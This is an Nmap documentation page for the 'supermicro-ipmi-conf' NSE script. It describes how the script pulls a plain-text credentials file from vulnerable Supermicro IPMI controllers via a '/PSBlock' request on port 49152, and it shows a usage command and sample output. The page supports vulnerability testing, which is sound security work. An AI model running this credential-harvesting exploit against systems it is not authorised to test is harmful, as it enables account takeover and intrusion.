Home page logo
/
Intro Reference Guide Book Install Guide
Download Changelog Zenmap GUI Docs
Bug Reports OS Detection Propaganda Related Projects
In the Movies In the News

File supermicro-ipmi-conf

Script types: portrule
Categories: exploit, vuln
Download: http://nmap.org/svn/scripts/supermicro-ipmi-conf.nse

User Summary

Attempts to download an unprotected configuration file containing plain-text user credentials in vulnerable Supermicro Onboard IPMI controllers.

The script connects to port 49152 and issues a request for "/PSBlock" to download the file. This configuration file contains users with their passwords in plain text.

References:

Script Arguments

supermicro-ipmi-conf.out

Output file to store configuration file. Default: <ip>_bmc.conf

http.max-cache-size, http.max-pipeline, http.pipeline, http.useragent

See the documentation for the http library.

smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername

See the documentation for the smbauth library.

vulns.showall

See the documentation for the vulns library.

Example Usage

nmap -p49152 --script supermicro-ipmi-conf <target>

Script Output

PORT      STATE SERVICE REASON
49152/tcp open  unknown syn-ack
| supermicro-ipmi-conf: 
|   VULNERABLE:
|   Supermicro IPMI/BMC configuration file disclosure
|     State: VULNERABLE (Exploitable)
|     Description:
|       Some Supermicro IPMI/BMC controllers allow attackers to download
|        a configuration file containing plain text user credentials. This credentials may be used to log in to the administrative interface and the 
|       network's Active Directory.
|     Disclosure date: 2014-06-19
|     Extra information:
|       Snippet from configuration file:
|   .............31spring.............\x14..............\x01\x01\x01.\x01......\x01ADMIN...........ThIsIsApAsSwOrD.............T.T............\x01\x01\x01.\x01......\x01ipmi............w00t!.............\x14.............
|   Configuration file saved to 'xxx.xxx.xxx.xxx_bmc.conf'
|   
|     References:
|_      http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras/

Requires


Author: Paulino Calderon <calderon () websec mx>

License: Same as Nmap--See http://nmap.org/book/man-legal.html

Nmap Site Navigation

Intro Reference Guide Book Install Guide
Download Changelog Zenmap GUI Docs
Bug Reports OS Detection Propaganda Related Projects
In the Movies In the News
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]